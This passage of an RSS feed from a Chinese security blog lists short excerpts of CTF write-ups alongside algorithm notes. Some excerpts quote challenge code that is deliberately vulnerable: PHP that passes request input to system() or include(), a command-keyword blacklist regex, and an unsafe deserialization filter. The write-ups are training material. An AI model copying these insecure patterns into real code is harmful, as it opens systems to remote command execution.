&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/06/litctf-2024/images/image-1.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/06/litctf-2024/images/image-1.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h3 id=&#34;sas---serializing-authentication-system&#34;&gt;SAS - Serializing Authentication System&lt;/h3&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/06/litctf-2024/images/image-3.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/06/litctf-2024/images/image-3.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;base64加密之后传入参数即可&lt;/p&gt;</description>
    </item>
    <item>
      <title>CTFshow-原谅杯</title>
      <link>https://www.hyhforever.top/posts/2024/03/ctfshow-forgive-cup/</link>
      <pubDate>Sat, 23 Mar 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/03/ctfshow-forgive-cup/</guid>
      <description>&lt;p&gt;&lt;em&gt;前言&lt;/em&gt; ：练习题目，康复训练&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id=&#34;原谅4&#34;&gt;原谅4&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt; &amp;lt;?php isset($_GET[&amp;#39;xbx&amp;#39;])?system($_GET[&amp;#39;xbx&amp;#39;]):highlight_file(__FILE__); 
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;题目给了这一段代码，但是经过测试，只有ls、rm、sh这三个命令能用&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/wp-content/uploads/2024/03/1711164713-image.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/wp-content/uploads/2024/03/1711164713-image.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;flag在根目录，没有直接读取文件的命令&lt;/p&gt;
&lt;p&gt;但是这个sh命令是可以执行文件中的命令的，类似于下图&lt;/p&gt;</description>
    </item>
    <item>
      <title>Pwn练习题</title>
      <link>https://www.hyhforever.top/posts/2023/12/pwn-practice/</link>
      <pubDate>Tue, 05 Dec 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/12/pwn-practice/</guid>
      <description>&lt;p&gt;题目来源于NSSCTF网站&lt;/p&gt;
&lt;h2 id=&#34;ret2text&#34;&gt;ret2text&lt;/h2&gt;
&lt;h3 id=&#34;swpuctf-2021-新生赛gift_pwn&#34;&gt;[SWPUCTF 2021 新生赛]gift_pwn&lt;/h3&gt;
&lt;p&gt;先放到虚拟机里checksec一下，能看到开启NX，没有PIE，64位&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/wp-content/uploads/2023/12/1701694411-image.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/wp-content/uploads/2023/12/1701694411-image.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;放进64位的IDA反编译一下，可以看到在gift函数里留了后门&lt;/p&gt;</description>
    </item>
    <item>
      <title>极客大挑战2023</title>
      <link>https://www.hyhforever.top/posts/2023/11/geekchallenge2023/</link>
      <pubDate>Thu, 02 Nov 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/11/geekchallenge2023/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;&lt;strong&gt;&lt;em&gt;前言&lt;/em&gt;&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;本校的极客大挑战还是要参加的，去年就很遗憾，今年得好好打一下，这次我会把能写的全写在博客里，同时也会学习一下其他的方向&lt;/p&gt;
&lt;p&gt;组队的队友是外校大三的网工学长，很强的选手！&lt;/p&gt;</description>
    </item>
    <item>
      <title>0xGame 2023</title>
      <link>https://www.hyhforever.top/posts/2023/10/0xgame-2023/</link>
      <pubDate>Sat, 07 Oct 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/10/0xgame-2023/</guid>
      <description>&lt;h2 id=&#34;week1&#34;&gt;WEEK1&lt;/h2&gt;
&lt;h3 id=&#34;signin&#34;&gt;signin&lt;/h3&gt;
&lt;p&gt;进去只有一个页面&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/10/0xgame-2023/images/image-26.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/10/0xgame-2023/images/image-26.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;源代码里没有东西，扫描后台也没有东西&lt;/p&gt;
&lt;p&gt;放进火狐浏览器，F12进入调试器&lt;/p&gt;
&lt;p&gt;在源码里发现flag&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/10/0xgame-2023/images/image-27.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/10/0xgame-2023/images/image-27.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h3 id=&#34;baby_php&#34;&gt;baby_php&lt;/h3&gt;
&lt;p&gt;源码如下&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt; &amp;lt;?php
// flag in flag.php
highlight_file(__FILE__);

if (isset($_GET[&amp;#39;a&amp;#39;]) &amp;amp;&amp;amp; isset($_GET[&amp;#39;b&amp;#39;]) &amp;amp;&amp;amp; isset($_POST[&amp;#39;c&amp;#39;]) &amp;amp;&amp;amp; isset($_COOKIE[&amp;#39;name&amp;#39;])) {
    $a = $_GET[&amp;#39;a&amp;#39;];
    $b = $_GET[&amp;#39;b&amp;#39;];
    $c = $_POST[&amp;#39;c&amp;#39;];
    $name = $_COOKIE[&amp;#39;name&amp;#39;];

    if ($a != $b &amp;amp;&amp;amp; md5($a) == md5($b)) {
        if (!is_numeric($c) &amp;amp;&amp;amp; $c != 1024 &amp;amp;&amp;amp; intval($c) == 1024) {
            include($name.&amp;#39;.php&amp;#39;);
        }
    }
}
?&amp;gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;首先是a和b的MD5弱比较&lt;/p&gt;</description>
    </item>
    <item>
      <title>SHCTF-2023</title>
      <link>https://www.hyhforever.top/posts/2023/10/shctf-2023/</link>
      <pubDate>Mon, 02 Oct 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/10/shctf-2023/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;&lt;em&gt;前言&lt;/em&gt;&lt;/h2&gt;
&lt;p&gt;写完week1感觉还是比较简单的，很基础&lt;/p&gt;
&lt;p&gt;也是放假在家不想打游戏，拿这个消磨一下时间&lt;/p&gt;
&lt;h2 id=&#34;week1&#34;&gt;WEEK1&lt;/h2&gt;
&lt;h3 id=&#34;babyrce&#34;&gt;babyRCE&lt;/h3&gt;
&lt;p&gt;题目源码&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;&amp;lt;?php

$rce = $_GET[&amp;#39;rce&amp;#39;];
if (isset($rce)) {
    if (!preg_match(&amp;#34;/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\&amp;gt;|\&amp;lt;|\&amp;#39;|\&amp;#34;/i&amp;#34;, $rce)) {
        system($rce);
    }else {
            echo &amp;#34;hhhhhhacker!!!&amp;#34;.&amp;#34;\n&amp;#34;;
    }
} else {
    highlight_file(__FILE__);
}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;过滤了部分命令和特殊符号&lt;/p&gt;</description>
    </item>
    <item>
      <title>NewStarCTF-2023</title>
      <link>https://www.hyhforever.top/posts/2023/09/newstarctf-2023/</link>
      <pubDate>Thu, 28 Sep 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/09/newstarctf-2023/</guid>
      <description>&lt;h2 id=&#34;week1&#34;&gt;Week1&lt;/h2&gt;
&lt;h3 id=&#34;泄漏的秘密&#34;&gt;泄漏的秘密&lt;/h3&gt;
&lt;p&gt;hint：粗心的网站管理员总会泄漏一些敏感信息在Web根目录下&lt;/p&gt;
&lt;p&gt;访问该网站目录下的robots.txt可以找到第一部分的flag&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/09/newstarctf-2023/images/image-6.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/09/newstarctf-2023/images/image-6.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;扫描一下后台，发现www.zip备份文件，将其下载下来，在index.php中发现第二部分flag&lt;/p&gt;</description>
    </item>
    <item>
      <title>MoeCTF-2023</title>
      <link>https://www.hyhforever.top/posts/2023/08/moectf-2023/</link>
      <pubDate>Tue, 15 Aug 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/08/moectf-2023/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;&lt;strong&gt;&lt;em&gt;前言&lt;/em&gt;&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;好久没玩CTF了，玩玩MoeCTF，就当是温故知新&lt;/p&gt;
&lt;p&gt;西电的这个终端看起来好高级的样子&lt;/p&gt;
&lt;p&gt;之前还没用过这种，长见识了&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/08/moectf-2023/images/image-22.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/08/moectf-2023/images/image-22.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h1 id=&#34;web&#34;&gt;WEB&lt;/h1&gt;
&lt;h2 id=&#34;web入门指北&#34;&gt;Web入门指北&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;DESCRIPTION: 解码获取flag&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>MS08-067漏洞测试</title>
      <link>https://www.hyhforever.top/posts/2023/08/ms08-067-review/</link>
      <pubDate>Thu, 10 Aug 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/08/ms08-067-review/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;前言&lt;/h2&gt;
&lt;p&gt;本文纯属于“照虎画猫”&lt;/p&gt;
&lt;p&gt;体验一下经典漏洞的复现过程&lt;/p&gt;
&lt;p&gt;对测试过程进行简单的了解&lt;/p&gt;
&lt;h2 id=&#34;ms08-067简介&#34;&gt;MS08-067简介&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”，攻击者利用受害者主机默认开放的SMB服务端口445，发送特殊RPC（Remote Procedure Call，远程过程调用）请求，造成栈缓冲区内存错误，从而被利用实施远程代码执行。&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Java-反射</title>
      <link>https://www.hyhforever.top/posts/2023/07/java-reflection/</link>
      <pubDate>Thu, 27 Jul 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/07/java-reflection/</guid>
      <description>&lt;h2 id=&#34;什么是反射&#34;&gt;什么是反射？&lt;/h2&gt;
&lt;p&gt;在Java中，反射是指程序在&lt;strong&gt;运行时&lt;/strong&gt;动态地获取&lt;strong&gt;类信息&lt;/strong&gt;、&lt;strong&gt;构造对象&lt;/strong&gt;、&lt;strong&gt;调用方法&lt;/strong&gt;和&lt;strong&gt;访问属性&lt;/strong&gt;的能力。&lt;/p&gt;
&lt;p&gt;换句话说，反射使得程序可以在运行时检查和操作任意一个类的成员变量、方法和构造方法，而不需要在编译时就确定下来。&lt;/p&gt;</description>
    </item>
    <item>
      <title>最短路径问题</title>
      <link>https://www.hyhforever.top/posts/2023/07/shortest-path-problem/</link>
      <pubDate>Mon, 17 Jul 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/07/shortest-path-problem/</guid>
      <description>&lt;p&gt;在之前的文章写过两种搜索方式&lt;/p&gt;
&lt;p&gt;深度优先搜索 and 广度优先搜索&lt;/p&gt;
&lt;p&gt;然后用这两种搜索方式来解决了图的一些问题&lt;/p&gt;
&lt;p&gt;这里学习几种新的算法&lt;/p&gt;
&lt;h2 id=&#34;floyd-warshall&#34;&gt;Floyd-Warshall&lt;/h2&gt;
&lt;p&gt;简单了解一下👇&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;介绍：&lt;strong&gt;Floyd-Warshall算法是有Floyd于1962年提出，其可以计算有向图中&lt;/strong&gt;任意&lt;/strong&gt;两点之间的&lt;strong&gt;最短路径&lt;/strong&gt;，此算法利用&lt;strong&gt;动态规划&lt;/strong&gt;的思想将计算的时间复杂度降低为 O(v^3) 【在这里我就简称 FW算法 了😋&lt;/p&gt;</description>
    </item>
    <item>
      <title>图的遍历</title>
      <link>https://www.hyhforever.top/posts/2023/07/graph-traversal/</link>
      <pubDate>Sat, 15 Jul 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/07/graph-traversal/</guid>
      <description>&lt;h2 id=&#34;深度和广度优先是什么&#34;&gt;深度和广度优先是什么？&lt;/h2&gt;
&lt;p&gt;之前学习过深度和广度优先搜索&lt;/p&gt;
&lt;p&gt;实际上深度和广度都是针对图的遍历而言的&lt;/p&gt;
&lt;p&gt;什么是图？&lt;/p&gt;
&lt;p&gt;请看下图，这是一个简单的有向图👇&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/07/graph-traversal/images/image-9.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/07/graph-traversal/images/image-9.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;下面是一个简单的无向图👇&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/07/graph-traversal/images/image-13.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/07/graph-traversal/images/image-13.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;简单的说，图就是由&lt;strong&gt;顶点&lt;/strong&gt;和&lt;strong&gt;边&lt;/strong&gt;组成的，在学离散数学的时候也涉及到了图论的相关知识&lt;/p&gt;</description>
    </item>
    <item>
      <title>深度与广度搜索</title>
      <link>https://www.hyhforever.top/posts/2023/07/depth-first-search-dfs-and-breadth-first-search-bfs/</link>
      <pubDate>Wed, 12 Jul 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/07/depth-first-search-dfs-and-breadth-first-search-bfs/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;前言&lt;/h2&gt;
&lt;p&gt;在说搜索方式之前&lt;/p&gt;
&lt;p&gt;先讲一个简单的问题：&lt;strong&gt;求数的全排列&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;比如说，123 的全排列就是：123、132、213、231、312、321&lt;/p&gt;
&lt;p&gt;这很简单吧&lt;/p&gt;
&lt;p&gt;全排列的个数就是这个数的位数的阶乘，即 123 的全排列的个数是 （ &lt;strong&gt;3！&lt;/strong&gt;=3×2×1）&lt;/p&gt;</description>
    </item>
    <item>
      <title>栈、队列、链表</title>
      <link>https://www.hyhforever.top/posts/2023/07/stack-queue-linked-list/</link>
      <pubDate>Mon, 10 Jul 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/07/stack-queue-linked-list/</guid>
      <description>&lt;h2 id=&#34;队列&#34;&gt;队列&lt;/h2&gt;
&lt;p&gt;队列的概念：只允许在一端进行插入数据操作，在另一端进行删除数据操作的&lt;strong&gt;特殊线性表&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;队列的两端：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;队尾：进行插入操作的一端称为&lt;strong&gt;队尾&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;队头：进行删除操作的一端称为&lt;strong&gt;队头&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>几个简单的排序</title>
      <link>https://www.hyhforever.top/posts/2023/07/%E5%87%A0%E4%B8%AA%E7%AE%80%E5%8D%95%E7%9A%84%E6%8E%92%E5%BA%8F/</link>
      <pubDate>Sun, 09 Jul 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/07/%E5%87%A0%E4%B8%AA%E7%AE%80%E5%8D%95%E7%9A%84%E6%8E%92%E5%BA%8F/</guid>
      <description>&lt;p&gt;从软工毕业学长那里淘来一本《啊哈！算法》&lt;/p&gt;
&lt;p&gt;然后跟着这本书学习学习，记录一下&lt;/p&gt;
&lt;h2 id=&#34;桶排序&#34;&gt;桶排序&lt;/h2&gt;
&lt;p&gt;在生活中会遇到一些排序问题，比如站队列的时候要按身高排序、考试的名次要按分数排序、网上购物有时会按价格排序……&lt;/p&gt;</description>
    </item>
    <item>
      <title>CTFshow-月饼杯&amp;吃瓜杯</title>
      <link>https://www.hyhforever.top/posts/2023/06/ctfshow-%E6%9C%88%E9%A5%BC%E6%9D%AF%E5%90%83%E7%93%9C%E6%9D%AF/</link>
      <pubDate>Sun, 25 Jun 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/06/ctfshow-%E6%9C%88%E9%A5%BC%E6%9D%AF%E5%90%83%E7%93%9C%E6%9D%AF/</guid>
      <description>&lt;p&gt;日常练习题 题目来源：&lt;a href=&#34;https://ctf.show/&#34;&gt;ctf.show&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&#34;月饼杯&#34;&gt;月饼杯&lt;/h2&gt;
&lt;h3 id=&#34;web1_此月圆&#34;&gt;Web1_此月圆&lt;/h3&gt;
&lt;p&gt;题目附件中有的index.php&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;&amp;lt;?php
class a
{
	public $uname;
	public $password;
	public function __construct($uname,$password)
	{
		$this-&amp;gt;uname=$uname;
		$this-&amp;gt;password=$password;
	}
	public function __wakeup()
	{
			if($this-&amp;gt;password===&amp;#39;yu22x&amp;#39;)
			{
				include(&amp;#39;flag.php&amp;#39;);
				echo $flag;	
			}
			else
			{
				echo &amp;#39;wrong password&amp;#39;;
			}
		}
	}
function filter($string){
    return str_replace(&amp;#39;Firebasky&amp;#39;,&amp;#39;Firebaskyup&amp;#39;,$string);
}
$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;这里只能GET传入一个名为1的变量，password是已经设置好为1的&lt;/p&gt;</description>
    </item>
    <item>
      <title>关于Nodejs原型链污染</title>
      <link>https://www.hyhforever.top/posts/2023/06/%E5%85%B3%E4%BA%8Enodejs%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/</link>
      <pubDate>Sat, 24 Jun 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/06/%E5%85%B3%E4%BA%8Enodejs%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/</guid>
      <description>&lt;h2 id=&#34;继承与原型链&#34;&gt;继承与原型链&lt;/h2&gt;
&lt;p&gt;在JavaScript中只有一种结构：对象（连函数也是一种对象）。&lt;/p&gt;
&lt;p&gt;每个对象都有一个_&lt;strong&gt;私有属性&lt;/strong&gt;_，指向另一个名为“原型”（prototype）的对象。&lt;/p&gt;</description>
    </item>
    <item>
      <title>浅谈Redis与SSRF</title>
      <link>https://www.hyhforever.top/posts/2023/06/redis%E4%B8%8Essrf/</link>
      <pubDate>Mon, 19 Jun 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/06/redis%E4%B8%8Essrf/</guid>
      <description>&lt;h2 id=&#34;什么是redis&#34;&gt;什么是Redis？&lt;/h2&gt;
&lt;p&gt;Redis是现在最受欢迎的NoSQL数据库之一，Redis是一个使用ANSI C编写的开源、包含多种数据结构、支持网络、基于内存、可选持久性的键值对存储数据库。&lt;/p&gt;</description>
    </item>
    <item>
      <title>HNCTF-2022</title>
      <link>https://www.hyhforever.top/posts/2023/06/hnctf-2022/</link>
      <pubDate>Sat, 17 Jun 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/06/hnctf-2022/</guid>
      <description>&lt;h1 id=&#34;week1&#34;&gt;week1&lt;/h1&gt;
&lt;h2 id=&#34;2048&#34;&gt;2048&lt;/h2&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/06/hnctf-2022/images/image-56.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/06/hnctf-2022/images/image-56.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;一个2048小游戏，先看看源码&lt;/p&gt;
&lt;p&gt;在源码中看到游戏的js文件&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/06/hnctf-2022/images/image-57.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/06/hnctf-2022/images/image-57.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;找找看有没有flag&lt;/p&gt;
&lt;p&gt;找到这一段代码&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/06/hnctf-2022/images/image-58.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/06/hnctf-2022/images/image-58.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;原来要超过20000分才弹出flag，这里直接把代码放到控制台运行，弹出flag&lt;/p&gt;</description>
    </item>
    <item>
      <title>LitCTF-2023</title>
      <link>https://www.hyhforever.top/posts/2023/06/litctf-2023/</link>
      <pubDate>Sat, 17 Jun 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/06/litctf-2023/</guid>
      <description>&lt;h2 id=&#34;我flag呢&#34;&gt;我flag呢？&lt;/h2&gt;
&lt;p&gt;进去之后页面是这样&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/06/litctf-2023/images/image-30.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/06/litctf-2023/images/image-30.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;先看看网页源码呢&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/06/litctf-2023/images/image-31.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/06/litctf-2023/images/image-31.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;在注释里拿到flag&lt;/p&gt;
&lt;p&gt;源码里也有一段彩蛋&lt;/p&gt;
&lt;h2 id=&#34;导弹迷踪&#34;&gt;&lt;strong&gt;导弹迷踪&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;进去之后好像是一个小游戏&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/06/litctf-2023/images/image-32.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/06/litctf-2023/images/image-32.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;先审查一下源码&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/06/litctf-2023/images/image-33.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/06/litctf-2023/images/image-33.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;在最下面看到Game files&lt;/p&gt;</description>
    </item>
  </channel>
</rss>
